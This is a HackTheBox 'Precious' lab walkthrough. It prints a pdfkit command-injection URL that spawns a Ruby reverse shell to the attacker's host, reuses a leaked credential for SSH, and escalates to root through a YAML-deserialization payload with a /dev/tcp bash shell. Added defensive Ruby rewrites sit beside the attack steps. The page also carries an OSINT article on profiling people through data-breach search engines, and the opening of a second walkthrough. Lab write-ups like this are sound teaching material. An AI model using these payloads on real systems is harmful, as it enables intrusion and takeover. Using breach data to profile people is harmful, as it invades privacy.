HTB Precious Walkthrough

A really simple BOX to start gaining experience!

The nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-11 14:57 EST
Nmap scan report for 10.10.11.189
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.24 seconds

Of course, the only access point is HTTP on port 80; add the precious.htb domain to the /etc/hosts file and proceed.

The portal seems to be a straightforward converter of web pages to PDF. Besides being the only access point, the feature leaves no doubt about the attack to be carried out: you just need to identify the exact tool used for the conversion and understand what kind of vulnerability it suffers from. Since the only available text field takes a URL, the vulnerability could be hidden in the URL itself or in the page to be converted (the payload). We therefore verify that the BOX reaches us and that we can pass our own payload: we start a native PHP server and insert our address in the form field.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.189 - Precious (lin)/attack]
└─$ php -S 10.10.14.79:5000 
[Sun Dec 11 15:07:49 2022] PHP 8.1.12 Development Server (http://10.10.14.79:5000) started
[Sun Dec 11 15:08:11 2022] 10.10.11.189:45994 Accepted
[Sun Dec 11 15:08:11 2022] 10.10.11.189:45994 [404]: GET / - No such file or directory
[Sun Dec 11 15:08:11 2022] 10.10.11.189:45994 Closing

The 404 error code, however, does not start the conversion, so I prepared an empty HTML page, downloaded the output of the operation, and looked inside for information about the tool used for the conversion.

%PDF-1.4
%âã
1 0 obj
<<
/Title ()
/Creator (��wkhtmltopdf 0.12.6)
/Producer (��Qt 5.15.2)
/CreationDate (D:20221211153322-05'00')
[...]
1037 
%%EOF
%BeginExifToolUpdate
1 0 obj
<<
/Creator (Generated by pdfkit v0.8.6)
>>
endobj
11 0 obj
[...]

I was a bit confused. Inside the file there seem to be indications of two different conversion tools: wkhtmltopdf and pdfkit. They’re both conversion tools, but I didn’t understand why both are being used. However, exiftool seems to identify pdfkit in the metadata.

┌──(in7rud3r㉿kali-muletto)-[~/Downloads]
└─$ exiftool 9y7vtnuzxwr6isk3hdttvuy8fng2kxrx.pdf 
ExifTool Version Number         : 12.51
File Name                       : 9y7vtnuzxwr6isk3hdttvuy8fng2kxrx.pdf
Directory                       : .
File Size                       : 4.6 kB
File Modification Date/Time     : 2022:12:11 15:37:29-05:00
File Access Date/Time           : 2022:12:11 15:38:06-05:00
File Inode Change Date/Time     : 2022:12:11 15:37:29-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

In order not to leave anything to chance, however, let’s also take a look at the first one. Searching for exploits for wkhtmltopdf, something comes up, but it doesn’t seem to work despite multiple attempts.

NVD – CVE-2022-35583
Convinced that the second tool is really the object of the challenge, I look for exploits for it.

CVE-2022-25765 – GitHub Advisory Database
PDFKit vulnerable to Command Injection
A nice list.

Snyk Vulnerability Database | Snyk
High severity (7.3) Command Injection in pdfkit | CVE-2022-25765
And that looked really interesting. I immediately tried the verification payload shown in the example, which gave me good results: the sleep seems to be executed before the conversion process, and the PDF is returned to me after the 15 seconds indicated; increasing the sleep time in the command also increases the interval before the download starts.

http://10.10.14.14:5000/file.html?name=#{'%20`sleep 15`'}

We should have identified the vulnerability. Now, let’s see how to use it. The second example payload also provides useful information: the output of the commands interpreted by the converter comes back as query parameters in the URL requested from my PHP server.

[Mon Dec 12 15:42:45 2022] 10.10.11.189:53504 Accepted
[Mon Dec 12 15:42:45 2022] 10.10.11.189:53504 [200]: GET /file.html?pwd=/var/www/pdfapp&user=ruby
[Mon Dec 12 15:42:45 2022] 10.10.11.189:53504 Closing

All we have to do is persist on this path, try to recover as much information as possible, and take advantage of command execution via injection of the payload into the URLs. Despite my attempts, I still couldn’t recover the contents of the most common files, so I looked for a more specific payload for this attack that would let me exploit an RCE, and I found it easily.

CVE-2022-25765-pdfkit-Exploit-Reverse-Shell | CTF导航
CVE-2022-25765-pdfkit-Exploit-Reverse-Shell pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tes…
Of course, I refined the attack and identified the payload that fits my scenario.

http://10.10.14.14:5000/file.html?name={%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.14",4444))')`}
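
The converter-side fix for the injection used above, as an added example that is not pdfkit’s code (pdfkit is the Ruby wrapper around wkhtmltopdf that the PDF metadata identified): accept only a plain http(s) URL made of RFC 3986 characters, and hand it to the converter as an argv element so no shell ever parses it. The wkhtmltopdf invocation and its --quiet flag are assumptions; the sample inputs are the box’s hostname and the page’s sleep probe.

```ruby
# Input handling for a URL-to-PDF converter, hardened against the shell
# injection shown in this walkthrough. Added example, not pdfkit's own code.
require "uri"

# Bytes a URL may contain per RFC 3986 (unreserved + reserved + "%").
# Backticks, braces, quotes and spaces, which the payloads above rely on,
# fall outside this set.
URL_BYTES = %r{\A[A-Za-z0-9\-._~:/?\[\]@!$&'()*+,;=#%]+\z}

# Returns the normalised URL, or nil when the input must not reach the converter.
def safe_url(input)
  return nil unless input.is_a?(String) && input.bytesize.between?(1, 2048)
  return nil unless input.match?(URL_BYTES)                 # no shell metacharacters at all
  uri = URI.parse(input)
  return nil unless %w[http https].include?(uri.scheme.to_s.downcase) # also blocks file:// reads
  return nil if uri.host.nil? || uri.host.empty?
  uri.to_s
rescue URI::InvalidURIError
  nil
end

# Build the converter command as an argv array. Process.spawn and IO.popen
# exec the binary directly when given an array, so nothing in the URL is
# interpreted by a shell. The scheme check also guarantees the URL never
# starts with "-", so it cannot be mistaken for an option.
# (wkhtmltopdf command line assumed: wkhtmltopdf [options] <input> <output>)
def converter_argv(input, output_path)
  url = safe_url(input)
  url && ["wkhtmltopdf", "--quiet", url, output_path]
end

# Run the conversion: true on success, false if the URL is rejected or the
# converter fails. Assumes wkhtmltopdf is installed on PATH.
def convert(input, output_path)
  argv = converter_argv(input, output_path)
  return false unless argv
  pid = Process.spawn(*argv, in: :close)   # array form: no shell involved
  _, status = Process.wait2(pid)
  status.success?
end

# Constructed inputs: the box's hostname and the sleep probe quoted above.
GOOD_URL  = "http://precious.htb/"
PROBE_URL = %q(http://10.10.14.14:5000/file.html?name=#{'%20`sleep 15`'})

if __FILE__ == $PROGRAM_NAME
  [GOOD_URL, PROBE_URL, "file:///etc/passwd"].each do |u|
    puts "#{u.inspect} -> #{safe_url(u).inspect}"
  end
end
```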

Perfect. Despite having obtained a reverse shell on the machine, it seems that my user does not own the user flag, let alone have permission to read it.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.189] 46478
whoami
ruby
pwd
/var/www/pdfapp
ls -la
total 36
drwxr-xr-x 6 root root 4096 Oct 26 08:28 .
drwxr-xr-x 4 root root 4096 Oct 26 08:28 ..
drwxr-xr-x 4 root ruby 4096 Oct 26 08:28 app
drwxr-xr-x 2 root ruby 4096 Oct 26 08:28 config
-rw-r--r-- 1 root ruby   59 Sep 10 09:46 config.ru
-rw-r--r-- 1 root ruby   99 Sep 17 14:17 Gemfile
-rw-r--r-- 1 root ruby  478 Sep 26 05:04 Gemfile.lock
drwxrwxr-x 2 root ruby 4096 Dec 12 16:34 pdf
drwxr-xr-x 4 root ruby 4096 Oct 26 08:28 public
ls -la /home/
total 16
drwxr-xr-x  4 root  root  4096 Oct 26 08:28 .
drwxr-xr-x 18 root  root  4096 Nov 21 15:11 ..
drwxr-xr-x  3 henry henry 4096 Dec 12 13:29 henry
drwxr-xr-x  4 ruby  ruby  4096 Dec 12 13:15 ruby
ls -la /home/ruby/
total 28
drwxr-xr-x 4 ruby ruby 4096 Dec 12 13:15 .
drwxr-xr-x 4 root root 4096 Oct 26 08:28 ..
lrwxrwxrwx 1 root root    9 Oct 26 07:53 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby  220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby 4096 Oct 26 08:28 .bundle
drwxr-xr-x 4 ruby ruby 4096 Dec 12 15:33 .cache
-rw-r--r-- 1 ruby ruby  807 Mar 27  2022 .profile
ls -la /home/henry/
total 32
drwxr-xr-x 3 henry henry 4096 Dec 12 13:29 .
drwxr-xr-x 4 root  root  4096 Oct 26 08:28 ..
lrwxrwxrwx 1 root  root     9 Sep 26 05:04 .bash_history -> /dev/null
-rw-r--r-- 1 henry henry  220 Sep 26 04:40 .bash_logout
-rw-r--r-- 1 henry henry 3526 Sep 26 04:40 .bashrc
-rw-r--r-- 1 henry henry  617 Dec 12 13:29 dependencies.yml
drwxr-xr-x 3 henry henry 4096 Dec 12 13:21 .local
-rw-r--r-- 1 henry henry  807 Sep 26 04:40 .profile
-rw-r----- 1 root  henry   33 Dec 12 13:14 user.txt
cat /home/henry/user.txt
cat: /home/henry/user.txt: Permission denied

I’m not here to rehash all of it. I tried launching a linpeas session.

[...]
╔══════════╣ CVEs Check
Potentially Vulnerable to CVE-2022-0847                                                                                                                                                                  

Potentially Vulnerable to CVE-2022-2588
[...]
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                                                       
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops                                                                                                                                           

   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: probable
   Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: ubuntu=(20.04|21.04),[ debian=11 ]
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
[...]
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                            
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                                                                                                                        
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:45983         0.0.0.0:*               LISTEN      798/Passenger RubyA 
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
[...]
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 root root 20086720 Dec 12 16:45 /var/log/nginx/access.log                                                                                                                                   

-rw-r----- 1 www-data adm 0 Dec 12 13:14 /var/log/nginx/error.log
[...]
                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════                                                                                                                      
                               ╚═══════════════════╝                                                                                                                                                     
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
strace Not Found                                                                                                                                                                                         
-rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20                                                                                                                               
-rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Jan 20  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 179K Feb 27  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 1.2M Mar 27  2022 /usr/bin/bash
-rwsr-xr-x 1 root root 71K Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 55K Jan 20  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Feb 26  2021 /usr/bin/fusermount
-rwsr-xr-- 1 root messagebus 51K Oct  5 07:04 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 471K Jul  1 18:37 /usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                         
-rwxr-sr-x 1 root ssh 347K Jul  1 18:37 /usr/bin/ssh-agent                                                                                                                                               
-rwxr-sr-x 1 root crontab 43K Feb 22  2021 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K Feb  7  2020 /usr/bin/expiry
-rwxr-sr-x 1 root tty 35K Jan 20  2022 /usr/bin/wall
-rwxr-sr-x 1 root shadow 79K Feb  7  2020 /usr/bin/chage
-rwxr-sr-x 1 root shadow 38K Aug 26  2021 /usr/sbin/unix_chkpwd
[...]
/home/ruby/.bundle
/home/ruby/.bundle/config
[...]

Apparently there’s a lot of stuff to check, but once you start getting familiar with HTB machines, you also start to understand that, in most cases, the CVEs suggested by the tool aren’t the solution. Leaving those aside and taking a quick look at the other clues, I’m immediately drawn to the .bundle folder (and the configuration file it contains), which is located in the home of the user I’m connected as.

cat .bundle/config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

I told you it would be a simple BOX. Inside the file, I found credentials that seem to belong to the user who owns the flag. Fooled by the fact that the BOX is starting to look a little too simple, I try to identify the password encryption algorithm with hashcat… but that doesn’t bring up anything. Almost disappointed and incredulous at what is going through my head, I tried to connect via SSH using the password as if it were unencrypted.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.189 - Precious (lin)/attack/hc]
└─$ ssh henry@10.10.11.189
The authenticity of host '10.10.11.189 (10.10.11.189)' can't be established.
ED25519 key fingerprint is SHA256:1WpIxI8qwKmYSRdGtCjweUByFzcn0MSpKgv+AwWRLkU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.189' (ED25519) to the list of known hosts.
henry@10.10.11.189's password: 
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 12 13:42:09 2022 from 10.10.14.53
-bash-5.1$ cat user.txt 
c******************************a

I admit I don’t know what that .bundle folder is, but after what I’ve seen, I don’t even want to investigate that much.

Ready to proceed on the more difficult road toward the root flag, I checked what I can launch as root without a password. I’m sure I won’t be able to execute…

-bash-5.1$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

…OK, forget it.

-bash-5.1$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

It appears to be a Ruby script that verifies the versions of the packages listed in a YAML file against the versions available from the official repositories. The YAML file is really very simple.

henry@precious:~$ find / -name "dependencies.yml" 2>/dev/null
/opt/sample/dependencies.yml
henry@precious:~$ cat /opt/sample/dependencies.yml
yaml: 0.1.1
pdfkit: 0.8.6

The first approach, looking for file replacements and user path overrides to trick the script, doesn’t lead me to any particular idea. However, YAML is a structure that can also contain information related to the execution of code or commands, references to files, and so on. I tried to take advantage of the load method of the YAML package used in the script. Searching on the Internet, I found something interesting.

Blind Remote Code Execution through YAML Deserialization
While performing an application security assessment on a Ruby on Rails project,
I discovered upload functionality that allowed users to upload text, CSV, and
YAML files. The latter option interested me because reading online suggested
YAML deserialization could be a potential vector. After a few up…
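
A hardened rewrite of the script shown above, as an added example that is not the box’s code: it keeps the version comparison but uses YAML.safe_load (in Psych before 4, i.e. Ruby before 3.1, YAML.load revives any Ruby object named by a !ruby/object tag, which is what the deserialization payload relies on), reads the list from a fixed absolute path instead of the caller’s working directory, and validates gem names and versions before using them. The /opt/sample/dependencies.yml path is taken from the page; the sample inputs are constructed.

```ruby
# Hardened rewrite of /opt/update_dependencies.rb. Added example, not the
# box's script: it removes the two things that turned the sudo rule into a
# root shell: YAML.load (reviving arbitrary Ruby objects from tags) and a
# relative path that let the caller pick which dependencies.yml is read.
require "yaml"
require "rubygems"

# Fixed, root-owned location; the original read "dependencies.yml" from the
# current directory. Path taken from the box's sample file.
DEPENDENCIES_FILE = "/opt/sample/dependencies.yml"
GEM_NAME = /\A[A-Za-z0-9][A-Za-z0-9_.\-]*\z/

# Parse the dependency list as plain data only. safe_load accepts just
# strings, numbers, booleans, nil, arrays and hashes: a !ruby/object tag
# raises Psych::DisallowedClass and anchors/aliases raise Psych::BadAlias.
# Returns [true, {name => version}] or [false, reason].
def parse_dependencies(text)
  data = YAML.safe_load(text)
  return [false, "expected a mapping of gem name to version"] unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && name.match?(GEM_NAME)
      return [false, "bad gem name: #{name.inspect}"]
    end
    # Versions must be strings: an unquoted 1.10 would parse as the float 1.1.
    unless version.is_a?(String) && Gem::Version.correct?(version)
      return [false, "bad version for #{name}: #{version.inspect}"]
    end
  end
  [true, data]
rescue Psych::Exception => e
  [false, "rejected #{e.class}: #{e.message}"]
end

# Name => version of every installed gem, newest version per name
# (the original script used Gem::Specification the same way).
def installed_gems
  Gem::Specification.latest_specs(true).map { |g| [g.name, g.version.to_s] }.to_h
end

# Compare semantically (Gem::Version) rather than by string as the original
# did, so "1.0" and "1.0.0" count as equal. Gems listed in the file but not
# installed are reported instead of silently skipped.
def compare_versions(wanted, installed)
  wanted.each_with_object({}) do |(name, version), report|
    local = installed[name]
    report[name] =
      if local.nil? then :not_installed
      elsif Gem::Version.new(local) == Gem::Version.new(version) then :same
      else :differs
      end
  end
end

# Constructed inputs: the shape of the box's sample file, and a tagged
# document of the kind YAML.load would turn into a live Gem::Installer.
SAMPLE_FILE = "yaml: 0.1.1\npdfkit: 0.8.6\n"
TAGGED_FILE = "---\n- !ruby/object:Gem::Installer\n  i: x\n"

if __FILE__ == $PROGRAM_NAME
  if File.file?(DEPENDENCIES_FILE)
    ok, result = parse_dependencies(File.read(DEPENDENCIES_FILE))
    if ok
      compare_versions(result, installed_gems).each { |name, state| puts "#{name}: #{state}" }
    else
      warn "refusing #{DEPENDENCIES_FILE}: #{result}"
    end
  else
    warn "#{DEPENDENCIES_FILE} not found; nothing to check"
  end
end
```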
Perfect, I prepare my payload…

henry@precious:/tmp/rbe$ cat dependencies.yml 
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/10.10.14.106/4444 0>&1'"
         method_id: :resolve

I ran the script as administrator…

henry@precious:/tmp/rbe$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found

…and here is my root shell, which allows me to retrieve the root flag.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.106] from (UNKNOWN) [10.10.11.189] 54934
root@precious:/tmp/rbe# whoami
whoami
root
root@precious:/tmp/rbe# cat /root/root.txt
cat /root/root.txt
5******************************2
root@precious:/tmp/rbe# ^C

This is a nice BOX to start with. That’s all, folks. Have fun with your hacking activities (legally, as always), and see you in the next BOX.

Secjuice – Read More

Using Newly Surfaced Data Breaches for OSINT Research

Data breaches are an unfortunate reality for many websites, leading to leaked information often posted on dark web forums or discovered by security researchers. Before this data disappears or is removed, Data Breach Search Engines (DBSEs) gather, verify, and categorize it, making it accessible to people seeking to understand what information may have been compromised. DBSEs like Have I Been Pwned allow OSINT (open-source intelligence) investigators to enter an email address and see if it was used on a breached site, often revealing critical information about the target’s online footprint. These DBSEs serve as an important privacy service, allowing users to know if their information has been exposed and, in some cases, request its removal from these databases.

What are Data Breach Search Engines?

DBSEs provide a way to find out where an email address, phone number, username, or other identifier has been used, giving researchers a clearer sense of a person’s digital presence. If a DBSE search shows that an email was compromised in a LinkedIn breach, for example, an investigator knows the person likely had a LinkedIn account. This information is invaluable for OSINT researchers, as it offers hints about a target’s professional network, social media presence, and even connections to colleagues or alternate emails. Some of the most popular DBSEs include Have I Been Pwned (searchable by email or phone), IntelX.io (email), and dehashed.com (email, username, domain, password, IP). There are also more specific breach-focused tools, such as haveibeenzucked.com for Facebook data and checkashleymadison.com for the Ashley Madison breach. These tools maintain deep web databases, and the information within them can often be accessed only through the website itself. For OSINT investigators, understanding DBSE resources is critical, as each can reveal unique details about where an email address, phone number, or other identifier was registered and whether it has been compromised.

Data Breaches Now Available on Data Breach Information Sites

This month, four major data breaches have appeared on platforms like Have I Been Pwned, each offering unique insights into different user communities. Although some breaches occurred years ago, the data is newly available on DBSEs, presenting OSINT researchers with new avenues to explore.

1. Internet Archive (October 2024)

In October 2024, the Internet Archive, famous for its digital preservation efforts and the Wayback Machine, experienced a breach affecting 31 million user accounts. Data exposed includes email addresses, screen names, and bcrypt-hashed passwords. The Internet Archive responded to the breach quickly and transparently, immediately implementing security measures, disabling compromised libraries, and restoring service in read-only mode while the organization strengthened its defenses. This breach is notable for OSINT researchers interested in online archives and historical data access, as it suggests users engaged in digital research or preservation activities.

2. VimeWorld (October 2018)

VimeWorld, a Russian Minecraft service, experienced a data breach in 2018 that exposed data on 3.1 million users. The compromised information includes usernames, email addresses, IP addresses, and hashed passwords (MD5 or bcrypt). This breach’s recent availability in DBSEs presents new opportunities for researchers interested in gaming communities, particularly among Russian-speaking audiences.

3. StreamCraft (July 2020)

The StreamCraft breach in July 2020 affected 1.8 million records, exposing usernames, email addresses, IP addresses, and hashed passwords (MD5 or bcrypt). StreamCraft data, newly accessible for OSINT purposes, provides a look into the online behavior of gaming communities, especially among users who favor multiplayer gaming.

4. AlpineReplay (2019)

The 2019 breach of AlpineReplay, a fitness-tracking app later integrated into Trace, exposed 900,000 records, including email addresses, usernames, dates of birth, gender, weight, and passwords hashed with MD5 or bcrypt. Recently appearing in DBSEs, this data gives insights into the interests of fitness enthusiasts, particularly those who use digital tools to track performance in sports like skiing and snowboarding.

Why These Data Breaches Matter to Researchers

When an OSINT researcher finds an email address in one of these breaches, it can reveal valuable information about the target’s digital activities. Each platform represents a specific online community or interest, giving clues about an individual’s preferences, affiliations, or lifestyle.

• Internet Archive: If someone’s data is in the Internet Archive breach, it might indicate an interest in digital preservation, academic research, or access to open-source content. This can suggest a background in academia or a strong interest in historical records.

• VimeWorld and StreamCraft: The presence of someone’s account in these gaming-related breaches points to involvement in online gaming, possibly within Russian-speaking or international communities. This can help an investigator understand the target’s recreational interests and engagement in gaming culture.

• AlpineReplay: An account in the AlpineReplay breach implies an interest in fitness, specifically in winter sports like skiing and snowboarding. The individual is likely health-conscious and inclined toward tracking their performance, providing insights into their lifestyle and personal values.

Simply knowing that a target’s email address is associated with one of these platforms can reveal a lot about them. However, OSINT researchers should approach this data cautiously. While these accounts provide contextual information, they don’t give a complete picture of a person’s behavior or habits, so researchers should use this information as a starting point rather than a conclusive profile.

Detailed Look at the Internet Archive Data Breach

The October 2024 Internet Archive breach involved the exposure of data from around 31 million user accounts. This breach, linked to a compromised GitLab token, allowed attackers to access development servers, revealing email addresses, screen names, and bcrypt-hashed passwords. The first breach occurred on October 9, with attackers exploiting a GitLab configuration file on the Internet Archive’s servers that contained an exposed authentication token. This gave them access to the source code, credentials, and, ultimately, the database management system, where they downloaded user data and modified site elements. Reports suggest this token had been accessible since December 2022, giving attackers a prolonged opportunity to exploit it. On October 20, a second breach occurred, this time exploiting unrotated Zendesk API tokens to access user support tickets. During this period, hackers defaced the Internet Archive’s website using JavaScript alerts and launched DDoS attacks attributed to the hacker group SN_BlackMeta. In response, the Internet Archive implemented security measures, scrubbed compromised systems, and temporarily operated in a read-only mode before restoring full access. This quick and transparent response from the Internet Archive emphasized the organization’s commitment to user security.

An additional OSINT trick is available for researchers using the Internet Archive. By using the search function on the top right corner of the Internet Archive’s website, investigators can enter an email address associated with a target’s account to see if an account exists. Although the email address itself isn’t publicly identified in the profile, the search function will still locate the account, providing access to profile information and showing data and websites archived by the user. This technique can be particularly useful for tracing interests, historical engagements, and online behavior through the Internet Archive.

Founder Brewster Kahle reported that the organization is reinforcing its defenses and emphasized the Internet Archive’s commitment to secure its platform. For OSINT researchers, this breach provides a unique opportunity to explore user demographics and interests in digital archives, though it demands careful handling to avoid further privacy violations.

HTB MonitorsTwo Walkthrough

Not a bad BOX: the foothold toward the user flag is interesting, but the privilege escalation to root is a little less convincing. Let’s begin.

The nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-14 15:26 EDT
Nmap scan report for 10.10.11.211
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.82 seconds

As usual, we start from a portal; I don’t see any indications of particular domain names, so we proceed in the more traditional way, browsing the portal by IP address.


Wow, really nice! :D


And some more information via Wappalyzer.

Cacti® – The Complete RRDTool-based Graphing Solution

